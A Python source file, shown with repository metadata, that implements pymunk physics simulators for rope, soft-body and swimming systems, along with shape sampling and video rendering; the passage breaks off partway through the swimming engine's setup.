| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5d23cf44825b41a14d84fbacce6d438be8a7bc24
| 58,254
|
py
|
Python
|
physics_engine.py
|
YunzhuLi/CompositionalKoopmanOperators
|
116057b11192bb2fbea2b9af411cddcee354dae8
|
[
"MIT"
] | 56
|
2020-04-28T14:34:15.000Z
|
2022-03-18T13:22:31.000Z
|
physics_engine.py
|
YunzhuLi/CompositionalKoopmanOperators
|
116057b11192bb2fbea2b9af411cddcee354dae8
|
[
"MIT"
] | 4
|
2020-06-29T19:53:27.000Z
|
2021-04-05T05:18:40.000Z
|
physics_engine.py
|
YunzhuLi/CompositionalKoopmanOperators
|
116057b11192bb2fbea2b9af411cddcee354dae8
|
[
"MIT"
] | 8
|
2020-06-09T16:12:24.000Z
|
2021-11-15T21:43:57.000Z
|
import os
import cv2
import matplotlib.pyplot as plt
import numpy as np
import pymunk
from matplotlib.collections import PatchCollection
from matplotlib.colors import to_rgba
from matplotlib.patches import Circle, Polygon
from pymunk.vec2d import Vec2d
from utils import rand_float, rand_int, calc_dis, norm
class Engine(object):
def __init__(self, dt, state_dim, action_dim, param_dim):
self.dt = dt
self.state_dim = state_dim
self.action_dim = action_dim
self.param_dim = param_dim
self.state = None
self.action = None
self.param = None
self.init()
def init(self):
pass
def get_param(self):
return self.param.copy()
def set_param(self, param):
self.param = param.copy()
def get_state(self):
return self.state.copy()
def set_state(self, state):
self.state = state.copy()
def get_scene(self):
return self.state.copy(), self.param.copy()
def set_scene(self, state, param):
self.state = state.copy()
self.param = param.copy()
def get_action(self):
return self.action.copy()
def set_action(self, action):
self.action = action.copy()
def d(self, state, t, param):
# time derivative
pass
def step(self):
pass
def render(self, state, param):
pass
def clean(self):
pass
class RopeEngine(Engine):
def __init__(self, dt, state_dim, action_dim, param_dim,
num_mass_range=[4, 8], k_range=[500., 1500.], gravity_range=[-2., -8.],
position_range=[-0.6, 0.6], bihop=True):
# state_dim = 4
# action_dim = 1
# param_dim = 5
# param [n_ball, init_x, k, damping, gravity]
self.radius = 0.06
self.mass = 1.
self.num_mass_range = num_mass_range
self.k_range = k_range
self.gravity_range = gravity_range
self.position_range = position_range
self.bihop = bihop
super(RopeEngine, self).__init__(dt, state_dim, action_dim, param_dim)
def init(self, param=None):
if param is None:
self.n_ball, self.init_x, self.k, self.damping, self.gravity = [None] * 5
else:
self.n_ball, self.init_x, self.k, self.damping, self.gravity = param
self.n_ball = int(self.n_ball)
num_mass_range = self.num_mass_range
position_range = self.position_range
if self.n_ball is None:
self.n_ball = rand_int(num_mass_range[0], num_mass_range[1])
if self.init_x is None:
self.init_x = np.random.rand() * (position_range[1] - position_range[0]) + position_range[0]
if self.k is None:
self.k = rand_float(self.k_range[0], self.k_range[1])
if self.damping is None:
self.damping = self.k / 20.
if self.gravity is None:
self.gravity = rand_float(self.gravity_range[0], self.gravity_range[1])
self.param = np.array([self.n_ball, self.init_x, self.k, self.damping, self.gravity])
# print('Env Rope param: n_ball=%d, init_x=%.4f, k=%.4f, damping=%.4f, gravity=%.4f' % (
# self.n_ball, self.init_x, self.k, self.damping, self.gravity))
self.space = pymunk.Space()
self.space.gravity = (0., self.gravity)
self.height = 1.0
self.rest_len = 0.3
self.add_masses()
self.add_rels()
self.state_prv = None
@property
def num_obj(self):
return self.n_ball
def add_masses(self):
inertia = pymunk.moment_for_circle(self.mass, 0, self.radius, (0, 0))
x = self.init_x
y = self.height
self.balls = []
for i in range(self.n_ball):
body = pymunk.Body(self.mass, inertia)
body.position = Vec2d(x, y)
shape = pymunk.Circle(body, self.radius, (0, 0))
if i == 0:
# fix the first mass to a specific height
move_joint = pymunk.GrooveJoint(self.space.static_body, body, (-2, y), (2, y), (0, 0))
self.space.add(body, shape, move_joint)
else:
self.space.add(body, shape)
self.balls.append(body)
y -= self.rest_len
def add_rels(self):
give = 1. + 0.075
# add springs over adjacent balls
for i in range(self.n_ball - 1):
c = pymunk.DampedSpring(
self.balls[i], self.balls[i + 1], (0, 0), (0, 0),
rest_length=self.rest_len * give, stiffness=self.k, damping=self.damping)
self.space.add(c)
# add bihop springs
if self.bihop:
for i in range(self.n_ball - 2):
c = pymunk.DampedSpring(
self.balls[i], self.balls[i + 2], (0, 0), (0, 0),
rest_length=self.rest_len * give * 2, stiffness=self.k * 0.5, damping=self.damping)
self.space.add(c)
def add_impulse(self):
impulse = (self.action[0], 0)
self.balls[0].apply_impulse_at_local_point(impulse=impulse, point=(0, 0))
def get_param(self):
return self.n_ball, self.init_x, self.k, self.damping, self.gravity
def get_state(self):
state = np.zeros((self.n_ball, 4))
for i in range(self.n_ball):
ball = self.balls[i]
state[i] = np.array([ball.position[0], ball.position[1], ball.velocity[0], ball.velocity[1]])
vel_dim = self.state_dim // 2
if self.state_prv is None:
state[:, vel_dim:] = 0
else:
state[:, vel_dim:] = (state[:, :vel_dim] - self.state_prv[:, :vel_dim]) / self.dt
return state
def step(self):
self.add_impulse()
self.state_prv = self.get_state()
self.space.step(self.dt)
def render(self, states, actions=None, param=None, video=True, image=False, path=None,
act_scale=None, draw_edge=True, lim=(-2.5, 2.5, -2.5, 2.5), states_gt=None,
count_down=False, gt_border=False):
if video:
video_path = path + '.avi'
fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')
print('Save video as %s' % video_path)
out = cv2.VideoWriter(video_path, fourcc, 25, (640, 480))
if image:
image_path = path + '_img'
print('Save images to %s' % image_path)
os.system('mkdir -p %s' % image_path)
c = ['royalblue', 'tomato', 'limegreen', 'orange', 'violet', 'chocolate', 'lightsteelblue']
time_step = states.shape[0]
n_ball = states.shape[1]
if actions is not None and actions.ndim == 3:
'''get the first ball'''
actions = actions[:, 0, :]
for i in range(time_step):
fig, ax = plt.subplots(1)
plt.xlim(lim[0], lim[1])
plt.ylim(lim[2], lim[3])
plt.axis('off')
if draw_edge:
cnt = 0
for x in range(n_ball - 1):
plt.plot([states[i, x, 0], states[i, x + 1, 0]],
[states[i, x, 1], states[i, x + 1, 1]],
'-', color=c[1], lw=2, alpha=0.5)
circles = []
circles_color = []
for j in range(n_ball):
circle = Circle((states[i, j, 0], states[i, j, 1]), radius=self.radius * 5 / 4)
circles.append(circle)
circles_color.append(c[0])
pc = PatchCollection(circles, facecolor=circles_color, linewidth=0, alpha=1.)
ax.add_collection(pc)
if states_gt is not None:
circles = []
circles_color = []
for j in range(n_ball):
circle = Circle((states_gt[i, j, 0], states_gt[i, j, 1]), radius=self.radius * 5 / 4)
circles.append(circle)
circles_color.append('orangered')
pc = PatchCollection(circles, facecolor=circles_color, linewidth=0, alpha=1.)
ax.add_collection(pc)
if actions is not None:
F = actions[i, 0] / 4
normF = norm(F)
if normF < 1e-10:
pass
else:
ax.arrow(states[i, 0, 0] + F / normF * 0.1, states[i, 0, 1],
F, 0., fc='Orange', ec='Orange', width=0.04, head_width=0.2, head_length=0.2)
ax.set_aspect('equal')
font = {'family': 'serif',
'color': 'darkred',
'weight': 'normal',
'size': 16}
if count_down:
plt.text(-2.5, 1.5, 'CountDown: %d' % (time_step - i - 1), fontdict=font)
plt.tight_layout()
if video:
fig.canvas.draw()
frame = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
frame = frame.reshape(fig.canvas.get_width_height()[::-1] + (3,))
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
out.write(frame)
if i == time_step - 1:
for _ in range(5):
out.write(frame)
if image:
plt.savefig(os.path.join(image_path, 'fig_%s.png' % i), bbox_inches='tight')
plt.close()
if video:
out.release()
# ===================================================================
'''
For Soft and Swim
'''
def get_init_p_fish_8():
init_p = np.zeros((8, 3))
init_p[0, :] = np.array([0, 0, 2])
init_p[1, :] = np.array([0, 1, 0])
init_p[2, :] = np.array([0, 2, 2])
init_p[3, :] = np.array([0, 3, 0])
init_p[4, :] = np.array([1, 0, 2])
init_p[5, :] = np.array([1, 1, 0])
init_p[6, :] = np.array([1, 2, 2])
init_p[7, :] = np.array([1, 3, 0])
return init_p
def sample_init_p_flight(n_box, shape_type=None, aug=False, train=False,
min_offset=False, max_offset=False):
assert 5 <= n_box < 10
c_box_dict = {
5: [[1, 3, 1], [2, 1, 2]],
6: [[3, 3], [2, 2, 2]],
7: [[2, 3, 2], [1, 2, 1, 2, 1], [2, 1, 1, 1, 2]],
8: [[2, 2, 2, 2], [1, 2, 2, 2, 1], [2, 1, 2, 1, 2], [3, 2, 3]],
9: [[2, 2, 1, 2, 2], [1, 2, 3, 2, 1], [2, 1, 3, 1, 2], [3, 3, 3]],
}
if shape_type is None:
shape_type = rand_int(0, len(c_box_dict[n_box]))
else:
shape_type = shape_type % len(c_box_dict[n_box])
c_box = c_box_dict[n_box][shape_type]
init_p = np.zeros((n_box, 3))
y_offset = np.zeros(len(c_box))
for i in range(1, (len(c_box) + 1) // 2):
left = c_box[i - 1]
right = c_box[i]
y_offset[i] = rand_int(1 - right, left)
if min_offset: y_offset[i] = 1 - right
if max_offset: y_offset[i] = left
y_offset[len(c_box) - i] = - y_offset[i]
assert len(c_box) - i > i
y = np.zeros(len(c_box))
for i in range(1, len(c_box)):
y[i] = y[i - 1] + y_offset[i]
y -= y.min()
# print('y_offset', y_offset, 'y', y)
while True:
idx = 0
for i, c in enumerate(c_box):
for j in range(c):
# if not train:
if False:
material = 2 if j < c - 1 or c == 1 else 0
else:
r = np.random.rand()
if c == 1:
r_actuated, r_soft, r_rigid = 0.25, 0.25, 0.5
elif j == 0:
r_actuated, r_soft, r_rigid = 0.0, 0.5, 0.5
elif j == c - 1:
r_actuated, r_soft, r_rigid = 0.75, 0.25, 0.0
else:
r_actuated, r_soft, r_rigid = 0.4, 0.2, 0.4
if r < r_actuated:
material = 0
elif r < r_actuated + r_soft:
material = 1
else:
material = 2
init_p[idx, :] = np.array([i, y[i] + j, material])
idx += 1
if (init_p[:, 2] == 0).sum() >= 2:
break
# print('init_p', init_p)
if aug:
if np.random.rand() > 0.5:
'''flip y'''
init_p[:, 1] = -init_p[:, 1]
if np.random.rand() > 0.5:
'''flip x'''
init_p[:, 0] = -init_p[:, 0]
if np.random.rand() > 0.5:
'''swap x and y'''
x, y = init_p[:, 0], init_p[:, 1]
init_p[:, 0], init_p[:, 1] = y.copy(), x.copy()
# print('init_p', init_p)
return init_p
def sample_init_p_regular(n_box, shape_type=None, aug=False):
print('sample_init_p')
init_p = np.zeros((n_box, 3))
if shape_type is None: shape_type = rand_int(0, 4)
print('shape_type', shape_type)
if shape_type == 0: # 0 or u shape
init_p[0, :] = np.array([0, 0, 2])
init_p[1, :] = np.array([-1, 0, 2])
init_p[2, :] = np.array([1, 0, 2])
idx = 3
y = 0
x = [-1, 0, 1]
res = n_box - 3
while res > 0:
y += 1
if res == 3:
i_list = [0, 1, 2]
else:
i_list = [0, 2]
material = [0, 1][int(np.random.rand() < 0.5 and res > 3)]
for i in i_list:
init_p[idx, :] = np.array([x[i], y, material])
idx += 1
res -= 1
elif shape_type == 1: # 1 shape
init_p[0, :] = np.array([0, 0, 2])
for i in range(1, n_box):
material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
init_p[i, :] = np.array([0, i, material])
elif shape_type == 2: # I shape
if n_box < 7:
init_p[0, :] = np.array([0, 0, 2])
for i in range(1, n_box - 3):
material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
init_p[i, :] = np.array([0, i, material])
init_p[n_box - 1, :] = np.array([-1, n_box - 3, 0])
init_p[n_box - 2, :] = np.array([0, n_box - 3, 0])
init_p[n_box - 3, :] = np.array([1, n_box - 3, 0])
else:
init_p[0, :] = np.array([-1, 0, 2])
init_p[1, :] = np.array([0, 0, 2])
init_p[2, :] = np.array([1, 0, 2])
for i in range(3, n_box - 3):
material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
init_p[i, :] = np.array([0, i - 2, material])
init_p[n_box - 1, :] = np.array([-1, n_box - 5, 0])
init_p[n_box - 2, :] = np.array([0, n_box - 5, 0])
init_p[n_box - 3, :] = np.array([1, n_box - 5, 0])
elif shape_type == 3: # T shape
if n_box < 6:
init_p[0, :] = np.array([-1, 0, 2])
init_p[1, :] = np.array([0, 0, 2])
init_p[2, :] = np.array([1, 0, 2])
for i in range(3, n_box):
material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
init_p[i, :] = np.array([0, i - 2, material])
else:
init_p[0, :] = np.array([-2, 0, 2])
init_p[1, :] = np.array([-1, 0, 2])
init_p[2, :] = np.array([0, 0, 2])
init_p[3, :] = np.array([1, 0, 2])
init_p[4, :] = np.array([2, 0, 2])
for i in range(5, n_box):
material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
init_p[i, :] = np.array([0, i - 4, material])
elif shape_type == 4: # stronger T
assert n_box == 10
init_p[0, :] = np.array([0, -4, 0])
init_p[1, :] = np.array([1, -4, 1])
init_p[2, :] = np.array([0, -3, 0])
init_p[3, :] = np.array([1, -3, 0])
init_p[4, :] = np.array([0, -2, 1])
init_p[5, :] = np.array([1, -2, 0])
init_p[6, :] = np.array([-1, -1, 2])
init_p[7, :] = np.array([0, -1, 2])
init_p[8, :] = np.array([1, -1, 2])
init_p[9, :] = np.array([2, -1, 2])
if aug:
if np.random.rand() > 0.5:
'''flip y'''
init_p[:, 1] = -init_p[:, 1]
if np.random.rand() > 0.5:
'''swap x and y'''
x, y = init_p[:, 0], init_p[:, 1]
init_p[:, 0], init_p[:, 1] = y.copy(), x.copy()
return init_p
class SoftEngine(Engine):
def __init__(self, dt, state_dim, action_dim, param_dim,
num_box_range=[5, 10], k_range=[600, 1000.]):
# state_dim = 4
# action_dim = 1
# param_dim = 4 - [n_box, k, damping, init_p]
# init_p: n_box * 3 - [x, y, type]
# type: 0 - soft & actuated, 1 - soft, 2 - rigid
self.side_length = 1.
self.num_box_range = num_box_range
self.k_range = k_range
self.radius = 0.01
self.mass = 1.
super(SoftEngine, self).__init__(dt, state_dim, action_dim, param_dim)
@property
def num_obj(self):
return self.n_box
def inside_lim(self, x, y, lim):
if x >= lim[0] and x < lim[1] and y >= lim[0] and y < lim[1]:
return True
return False
def sample_init_p(self):
n_box = self.n_box
r_actuated = 0.5
r_soft = 0.25
r_rigid = 0.25
lim = -4, 4
mask = np.zeros((lim[1] - lim[0], lim[1] - lim[0]))
init_p = np.zeros((n_box, 3))
buf = []
# add a fixed box
x, y = 0, -4
init_p[0] = np.array([x, y, 3])
buf.append([x - 1, y])
buf.append([x, y + 1])
buf.append([x + 1, y])
mask[x, y] = mask[x - 1, y] = mask[x, y + 1] = mask[x + 1, y] = 1
for i in range(1, n_box):
roll_type = np.random.rand()
if roll_type < r_actuated:
init_p[i, 2] = 0
elif roll_type < r_actuated + r_soft:
init_p[i, 2] = 1
else:
init_p[i, 2] = 2
if len(buf) > 0:
idx = rand_int(0, len(buf))
x = buf[idx][0]
y = buf[idx][1]
del buf[idx]
else:
x = rand_int(lim[0], lim[1])
y = rand_int(lim[0], lim[1])
init_p[i, 0], init_p[i, 1] = x, y
mask[x, y] = 1
if self.inside_lim(x + 1, y, lim) and mask[x + 1, y] == 0:
buf.append([x + 1, y]);
mask[x + 1, y] = 1
if self.inside_lim(x - 1, y, lim) and mask[x - 1, y] == 0:
buf.append([x - 1, y]);
mask[x - 1, y] = 1
if self.inside_lim(x, y + 1, lim) and mask[x, y + 1] == 0:
buf.append([x, y + 1]);
mask[x, y + 1] = 1
if self.inside_lim(x, y - 1, lim) and mask[x, y - 1] == 0:
buf.append([x, y - 1]);
mask[x, y - 1] = 1
while (init_p[:, 2] == 0).sum() < 2:
''' less than 2 actuated'''
''' re-generate box type'''
for i in range(1, n_box):
roll_type = np.random.rand()
if roll_type < r_actuated:
init_p[i, 2] = 0
elif roll_type < r_actuated + r_soft:
init_p[i, 2] = 1
else:
init_p[i, 2] = 2
return init_p
def init(self, param=None):
if param is None:
self.n_box, self.k, self.damping, self.init_p = [None] * 4
else:
self.n_box, self.k, self.damping, self.init_p = param
self.n_box = int(self.n_box)
if self.n_box is None:
self.n_box = rand_int(self.num_box_range[0], self.num_box_range[1])
if self.k is None:
self.k = rand_float(self.k_range[0], self.k_range[1])
if self.damping is None:
self.damping = self.k / 20.
if self.init_p is None:
self.init_p = self.sample_init_p()
# self.init_p = sample_init_p_regular(self.n_box, shape_type=4)
# print('Env Soft param: n_box=%d, k=%.4f, damping=%.4f' % (self.n_box, self.k, self.damping))
self.space = pymunk.Space()
self.space.gravity = (0., 0.)
self.add_masses()
self.add_rels()
self.state_prv = None
def add_masses(self):
inertia = pymunk.moment_for_circle(self.mass, 0, self.radius, (0, 0))
self.balls = []
for i in range(self.n_box):
x, y, t = self.init_p[i]
l = self.side_length / 2.
for j in range(4):
body = pymunk.Body(self.mass, inertia)
if j == 0:
body.position = Vec2d(x - l, y - l)
elif j == 1:
body.position = Vec2d(x - l, y + l)
elif j == 2:
body.position = Vec2d(x + l, y - l)
else:
body.position = Vec2d(x + l, y + l)
# shape = pymunk.Circle(body, self.radius, (0, 0))
# self.space.add(body, shape)
self.space.add(body)
self.balls.append(body)
def add_rels(self):
ball = self.balls[0]
c = pymunk.PinJoint(self.space.static_body, ball, (ball.position[0], ball.position[1]), (0, 0))
self.space.add(c)
ball = self.balls[2]
c = pymunk.PinJoint(self.space.static_body, ball, (ball.position[0], ball.position[1]), (0, 0))
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[0], self.balls[1], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[1], self.balls[3], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[2], self.balls[3], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[1], self.balls[2], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[0], self.balls[3], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
for i in range(1, self.n_box):
if self.init_p[i, 2] <= 1:
# if the box is soft
# side
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 1], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 3], self.balls[i * 4 + 1], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 3], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
# cross
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 3], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 1], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
else:
# if the box is rigid
# side
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 1], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 3], self.balls[i * 4 + 1], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 3], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
# cross
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 3], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 1], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
# add PinJoint to adjacent boxes
for i in range(self.n_box):
for j in range(i):
for ii in range(4):
for jj in range(4):
x, y = i * 4 + ii, j * 4 + jj
if calc_dis(self.balls[x].position, self.balls[y].position) < 1e-4:
c = pymunk.PinJoint(self.balls[x], self.balls[y], (0, 0), (0, 0))
self.space.add(c)
def add_force(self):
for i in range(self.n_box):
if self.init_p[i, 2] == 0:
# if the current box has actuator
for j in range(4):
x, y = i * 4 + j, i * 4 + (3 - j)
direct = np.array([
self.balls[y].position[0] - self.balls[x].position[0],
self.balls[y].position[1] - self.balls[x].position[1]])
direct /= norm(direct)
force = direct * self.action[i]
self.balls[x].apply_force_at_local_point(
force=(force[0], force[1]), point=(0, 0))
def get_param(self):
return self.n_box, self.k, self.damping, self.init_p
def get_state(self):
state = np.zeros((self.n_box, 16))
for i in range(self.n_box):
for j in range(4):
ball = self.balls[i * 4 + j]
state[i, j * 2: (j + 1) * 2] = \
np.array([ball.position[0], ball.position[1]])
state[i, 8 + j * 2: 8 + (j + 1) * 2] = \
np.array([ball.velocity[0], ball.velocity[1]])
state_acc = state.copy()
count = np.zeros((self.n_box, 1, 8))
for i in range(self.n_box):
for j in range(self.n_box):
if i == j:
count[i, :, :] += 1
continue
delta = self.init_p[i, :2] - self.init_p[j, :2]
assert (np.abs(delta) > 0).any()
if (np.abs(delta) > 1).any():
# no contact
continue
if np.sum(np.abs(delta)) == 1:
# contact at a side
if delta[0] == 1:
x0, y0, x1, y1 = 1, 3, 0, 2
elif delta[0] == -1:
x0, y0, x1, y1 = 3, 1, 2, 0
elif delta[1] == 1:
x0, y0, x1, y1 = 0, 1, 2, 3
elif delta[1] == -1:
x0, y0, x1, y1 = 1, 0, 3, 2
x0 *= 2
y0 *= 2
x1 *= 2
y1 *= 2
count[i, :, x0:x0 + 2] += 1
count[i, :, x1:x1 + 2] += 1
state_acc[i, x0:x0 + 2] += state[j, y0:y0 + 2]
state_acc[i, x0 + 8:x0 + 10] += state[j, y0 + 8:y0 + 10]
state_acc[i, x1:x1 + 2] += state[j, y1:y1 + 2]
state_acc[i, x1 + 8:x1 + 10] += state[j, y1 + 8:y1 + 10]
elif np.sum(np.abs(delta)) == 2:
# contact at a corner
if delta[0] == 1 and delta[1] == 1:
x, y = 0, 3
elif delta[0] == 1 and delta[1] == -1:
x, y = 1, 2
elif delta[0] == -1 and delta[1] == 1:
x, y = 2, 1
elif delta[0] == -1 and delta[1] == -1:
x, y = 3, 0
x *= 2
y *= 2
count[i, :, x:x + 2] += 1
state_acc[i, x:x + 2] += state[j, y:y + 2]
state_acc[i, x + 8:x + 10] += state[j, y + 8:y + 10]
state_acc = state_acc.reshape(self.n_box, 2, 8) / count
state_acc = state_acc.reshape(self.n_box, 16)
vel_dim = self.state_dim // 2
if self.state_prv is None:
state_acc[:, vel_dim:] = 0
else:
state_acc[:, vel_dim:] = (state_acc[:, :vel_dim] - self.state_prv[:, :vel_dim]) / self.dt
return state_acc
def step(self):
self.add_force()
self.state_prv = self.get_state()
self.space.step(self.dt)
def render(self, states, actions=None, param=None, act_scale=10.,
video=True, image=False, path=None, lim=(-5., 5., -6., 4.),
states_gt=None, count_down=False, gt_border=False):
if video:
video_path = path + '.avi'
fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')
print('Save video as %s' % video_path)
out = cv2.VideoWriter(video_path, fourcc, 25, (640, 480))
if image:
image_path = path + '_img'
print('Save images to %s' % image_path)
os.system('mkdir -p %s' % image_path)
c = ['royalblue', 'tomato', 'limegreen', 'orange', 'violet', 'chocolate', 'lightsteelblue']
time_step = states.shape[0]
n_ball = states.shape[1] * 4
states = states[:, :, :8].reshape((time_step, n_ball, 2))
if states_gt is not None:
states_gt = states_gt[:, :, :8].reshape((time_step, n_ball, 2))
init_p = param[3]
for i in range(time_step):
fig, ax = plt.subplots(1)
plt.xlim(lim[0], lim[1])
plt.ylim(lim[2], lim[3])
plt.axis('off')
polys = []
polys_color = []
circles = []
circles_color = []
for j in [0, 2]:
circle = Circle((states[i, j, 0], states[i, j, 1]), radius=0.1)
circles.append(circle)
circles_color.append('orangered')
for j in range(self.n_box):
poly = Polygon(np.array([
states[i, j * 4, :2], states[i, j * 4 + 1, :2],
states[i, j * 4 + 3, :2], states[i, j * 4 + 2, :2]]), True)
polys.append(poly)
if init_p[j, 2] == 0:
if actions is not None:
act = actions[i, j]
else:
act = 0.
r = (act + act_scale) / (act_scale * 2)
if np.abs(r - 0.5) < 1e-4:
c = 'cornflowerblue'
else:
c = to_rgba('tomato')[:3] * r + to_rgba('limegreen')[:3] * (1. - r)
c = np.clip(c, 0., 1.)
polys_color.append(c)
elif init_p[j, 2] == 1:
polys_color.append('lightsteelblue')
elif init_p[j, 2] == 2:
polys_color.append('dimgray')
elif init_p[j, 2] == 3:
polys_color.append('lightsteelblue')
else:
raise AssertionError("Unknown box type %f" % init_p[j, 2])
if states_gt is not None:
polys_gt = []
for j in range(self.n_box):
poly = Polygon(np.array([
states_gt[i, j * 4, :2], states_gt[i, j * 4 + 1, :2],
states_gt[i, j * 4 + 3, :2], states_gt[i, j * 4 + 2, :2]]), True)
polys_gt.append(poly)
if gt_border:
pc_polys_gt = PatchCollection(
polys_gt, facecolor=(0., 0., 0., 0.), edgecolor='orangered', lw=1.)
else:
pc_polys_gt = PatchCollection(
polys_gt, facecolor=polys_color, linewidth=0, alpha=0.5)
circles_gt = []
for j in [0, 2]:
circle = Circle((states[i, j, 0], states[i, j, 1]), radius=0.1)
circles_gt.append(circle)
pc_circles_gt = PatchCollection(circles_gt, facecolor=circles_color, linewidth=0, alpha=0.5)
pc_polys = PatchCollection(polys, facecolor=polys_color, linewidth=0, alpha=1.)
pc_circles = PatchCollection(circles, facecolor=circles_color, linewidth=0, alpha=1.)
ax.add_collection(pc_polys)
ax.add_collection(pc_circles)
if states_gt is not None:
ax.add_collection(pc_polys_gt)
ax.add_collection(pc_circles_gt)
ax.set_aspect('equal')
font = {'family': 'serif',
'color': 'darkred',
'weight': 'normal',
'size': 16}
if count_down:
plt.text(-5, 3, 'CountDown: %d' % (time_step - i - 1), fontdict=font)
plt.tight_layout()
if video:
fig.canvas.draw()
frame = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
frame = frame.reshape(fig.canvas.get_width_height()[::-1] + (3,))
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
out.write(frame)
if i == time_step - 1:
for _ in range(10):
out.write(frame)
if image:
plt.savefig(os.path.join(image_path, 'fig_%s.png' % i), bbox_inches='tight')
plt.close()
if video:
out.release()
class SwimEngine(Engine):
def __init__(self, dt, state_dim, action_dim, param_dim,
num_box_range=[5, 10], k_range=[600, 800.]):
# state_dim = 4
# action_dim = 1
# param_dim = 4 - [n_box, k, damping, init_p]
# init_p: n_box * 3 - [x, y, type]
# type: 0 - soft & actuated, 1 - soft, 2 - rigid
self.side_length = 1.
self.num_box_range = num_box_range
self.k_range = k_range
self.radius = 0.01
self.mass = 1.
super(SwimEngine, self).__init__(dt, state_dim, action_dim, param_dim)
@property
def num_obj(self):
return self.n_box
def inside_lim(self, x, y, lim):
if x >= lim[0] and x < lim[1] and y >= lim[0] and y < lim[1]:
return True
return False
def sample_init_p(self):
n_box = self.n_box
r_actuated = 0.5
r_soft = 0.25
r_rigid = 0.25
lim = -4, 4
mask = np.zeros((lim[1] - lim[0], lim[1] - lim[0]))
init_p = np.zeros((n_box, 3))
buf = []
for i in range(n_box):
roll_type = np.random.rand()
if roll_type < r_actuated:
init_p[i, 2] = 0
elif roll_type < r_actuated + r_soft:
init_p[i, 2] = 1
else:
init_p[i, 2] = 2
if len(buf) > 0:
idx = rand_int(0, len(buf))
x = buf[idx][0]
y = buf[idx][1]
del buf[idx]
else:
x = rand_int(lim[0] // 2, lim[1] // 2)
y = rand_int(lim[0] // 2, lim[1] // 2)
init_p[i, 0], init_p[i, 1] = x, y
mask[x, y] = 1
if self.inside_lim(x + 1, y, lim) and mask[x + 1, y] == 0:
buf.append([x + 1, y]);
mask[x + 1, y] = 1
if self.inside_lim(x - 1, y, lim) and mask[x - 1, y] == 0:
buf.append([x - 1, y]);
mask[x - 1, y] = 1
if self.inside_lim(x, y + 1, lim) and mask[x, y + 1] == 0:
buf.append([x, y + 1]);
mask[x, y + 1] = 1
if self.inside_lim(x, y - 1, lim) and mask[x, y - 1] == 0:
buf.append([x, y - 1]);
mask[x, y - 1] = 1
while (init_p[:, 2] == 0).sum() < 2:
''' less than 2 actuated'''
''' re-generate box type'''
for i in range(n_box):
roll_type = np.random.rand()
if roll_type < r_actuated:
init_p[i, 2] = 0
elif roll_type < r_actuated + r_soft:
init_p[i, 2] = 1
else:
init_p[i, 2] = 2
return init_p
def calc_outside(self):
# recorde whether a specific edge is in the outside
self.outside = np.ones((self.n_box, 4))
for i in range(self.n_box):
for j in range(self.n_box):
if i == j:
continue
delta = self.init_p[i, :2] - self.init_p[j, :2]
assert (np.abs(delta) > 0).any()
if (np.abs(delta) > 1).any():
# no contact
continue
if np.sum(np.abs(delta)) == 1:
# contact at a side
if delta[0] == 1:
self.outside[i, 0] = 0
elif delta[0] == -1:
self.outside[i, 2] = 0
elif delta[1] == 1:
self.outside[i, 3] = 0
elif delta[1] == -1:
self.outside[i, 1] = 0
def init(self, param=None):
